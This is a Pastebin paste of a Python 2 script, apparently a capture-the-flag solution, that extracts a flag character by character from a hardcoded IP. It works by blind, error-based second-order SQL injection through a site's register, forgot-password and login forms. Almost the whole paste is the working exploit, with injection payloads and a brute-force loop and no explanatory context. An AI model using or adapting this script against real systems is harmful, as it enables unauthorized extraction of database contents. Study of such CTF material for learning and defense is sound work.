Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import random,requests,string
- #20BILLION_D0LLAR_1D3A <- flag
- #razor4x - tasteless
- main="http://54.196.116.77/index.php?page=login"
- # reg "name=blah&pass=blah&email=blah®ister=Register"
- # forgot name=blah&reset=Forgot+Password&pass=&email=
- # login name=blah&pass=blah&login=Login&email=
- def randomword(length):
- return ''.join(random.choice(string.lowercase) for i in range(length))
- pwd=""
- for num in xrange(1,22):
- for c in xrange(32,122):
- tmp_name=randomword(10)
- c=chr(c)
- #print "register the test name"
- payload = {'name': tmp_name, 'pass': tmp_name, "email":"asd","register":"Register"}
- r=requests.post(main,data=payload)
- #print r.text
- #print "register the exploit name"
- query=tmp_name+"' and (select if((select substr(flag,"+str(num)+",1) from flag)='"+c+"',1,2*(select 1 union select 2)))#"
- #query=base+"0"+"'and(select(if((select(1)from(flag)where(flag)like('"+c+"%'))=1,1,2*(select 1 union select 2))))-- -"
- #query=base+"0"+"'and(select(if((select(1)from(flag)where(flag)like('%'))=1,1,2*(select 1 union select 2))))-- -"
- payload = {'name': query, 'pass': "asd", "email":"asd","register":"Register"}
- r=requests.post(main,data=payload)
- #print r.text
- #print "forgot request"
- payload = {'name': query, 'pass': "", "email":"","reset":"Forgot+Password"}
- r=requests.post(main,data=payload)
- #print r.text
- #print "try to login with test name"
- payload = {'name': tmp_name, 'pass': tmp_name, "email":"","login":"Login"}
- r=requests.post(main,data=payload)
- #print r.text
- if 'Welcome' not in r.text:
- print "OK: "+c
- pwd+=c
- break
- else:
- print "Nope..."+c
- #break
- #break
- print pwd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement